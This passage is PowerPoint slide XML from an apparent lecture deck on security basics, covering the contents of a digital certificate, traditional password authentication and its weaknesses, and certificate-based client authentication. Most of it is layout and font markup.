          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994681" y="2652566"/>
            <a:ext cx="7610476" cy="3670767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>the certificate includes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>the public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>the name of the entity that owns it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>an expiry date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>the name of the CA that issued the certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>a serial number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>a digital signature signed by the CA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB537149-47A2-3547-ACF2-1755A5B5A89F}"/>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31757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69" y="927098"/>
            <a:ext cx="6732259" cy="709865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traditional Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284163" y="1999449"/>
            <a:ext cx="8391686" cy="3044841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BF3D28"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Without certificate)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t> is the act of verifying an identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1900" dirty="0"/>
              <a:t>the most common authentication method currently in use is the username/password (called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1900" b="1" dirty="0"/>
              <a:t>password authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>the username represents the identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>the (secret) password "guarantees" the identity of the person using the username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1900" dirty="0"/>
              <a:t>common problems with password authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>passwords chosen are often easily guessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>the password is often sent over the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 12"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="284163" y="5133121"/>
          <a:ext cx="8484854" cy="1538182"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8484854">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1538182">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>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Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3687697" y="5902212"/>
            <a:ext cx="1993321"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9849" y="5353734"/>
            <a:ext cx="994908" cy="112235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0249" y="5456238"/>
            <a:ext cx="766442" cy="89194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Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2150091" y="5902212"/>
            <a:ext cx="658358" cy="127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9" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3646649" y="5353734"/>
            <a:ext cx="2034370" cy="438765"/>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200">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>2. sends username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>and password to server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6708811" y="5228255"/>
            <a:ext cx="1967037" cy="623431"/>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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>3. server authenticates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>username with password </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6708812" y="6111649"/>
            <a:ext cx="1903413" cy="434975"/>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lIns="68763" tIns="34381" rIns="68763" bIns="34381">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr defTabSz="687388" eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
              <a:defRPr kumimoji="0" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>4. server allows access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>to resource</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="598649" y="5697425"/>
            <a:ext cx="1692275" cy="434975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050"/>
          <a:extLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="non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1200" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. user enters name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" latinLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-AU" altLang="ko-KR" sz="1200" dirty="0">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06288FAC-8F9E-9E4E-9543-C27F9DBCF0C7}"/>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98216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585" y="600520"/>
            <a:ext cx="8309512" cy="956272"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certificate-based Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305210" y="2017524"/>
            <a:ext cx="8545887" cy="3118505"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" dirty="0"/>
              <a:t>certificates can be used for authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>., for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>client sends certificate to server (this includes the client's public key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>the client also sends some random data that is signed with its private key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>access to the private key is protected by a password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>the server uses the public key (in the certificate) to verify that the random data hasn't been tampered with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1500" dirty="0"/>
              <a:t>no tamper means that the sender is genuine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 13"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="476172" y="4856008"/>
          <a:ext cx="8229599" cy="1782033"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8229599">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1782033">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>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Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3634652" y="5558685"/>
            <a:ext cx="1916070" cy="9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575" y="4975669"/>
            <a:ext cx="926076" cy="10447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6004" y="5524281"/>
            <a:ext cx="735374" cy="85579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Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2283647" y="5558685"/>
            <a:ext cx="5461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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3676571" y="5036222"/>
            <a:ext cx="2353893" cy="407988"/>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100">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="344488" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="687388" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1031875" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1374775" defTabSz="687388">
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1831975" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2289175" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2746375" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3203575" defTabSz="687388" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>3. client sends certificate and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t> to server using SSL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
